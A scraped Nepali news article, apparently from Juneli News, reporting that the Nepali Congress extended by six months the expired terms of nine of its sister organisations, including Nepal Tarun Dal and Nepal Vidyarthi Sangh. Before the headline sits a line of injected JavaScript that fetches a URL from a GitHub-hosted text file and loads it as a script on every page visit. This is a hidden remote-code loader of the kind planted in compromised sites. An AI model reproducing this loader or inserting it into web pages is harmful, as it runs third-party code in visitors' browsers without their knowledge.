;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); कांग्रेसले म्याद गुजारेका नौ वटा भ्रातृ संघसंस्थाहरुको म्याद ६ महिना थप गर्यो – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • कांग्रेसले म्याद गुजारेका नौ वटा भ्रातृ संघसंस्थाहरुको म्याद ६ महिना थप गर्यो
Breaking News

कांग्रेसले म्याद गुजारेका नौ वटा भ्रातृ संघसंस्थाहरुको म्याद ६ महिना थप गर्यो

जुनेली न्यूज, काठमाडौं ।नेपाली कांग्रेसका १३ वटा भातृ संस्थाहरु छन् । जसमध्य कांग्रेसले म्याद गुजारेका नौ वटा भ्रातृ संघसंस्थाहरुको म्याद ६ महिना थप गरेको छ ।

म्याद समाप्त भएकानौ वटा भ्रातृ संघसंस्थाहरु क्रमशः नेपाल तरुण दल, नेपाल विद्यार्थी संघ नेपाल प्रजातन्त्र सेनानी संघ, नेपाल किसान संघ, नेपाल दलित संघ, नेपाल आदिवासी जनजाती संघ, राष्ट्रिय लोकतान्त्रिक अपांग संघ, नेपाल तामाङ संघ र नेपाल ठाकुर समाज रहेका छन् |

म्याद गुजारेका यी नौ वटा भ्रातृ संघसंस्थाहरुको म्याद पदावधी समाप्त भएको मितिले ६ महिना थप गर्ने निर्णय कांग्रेसले गरेको जनाएको छ ।

फेसबुक प्रतिक्रियाहरु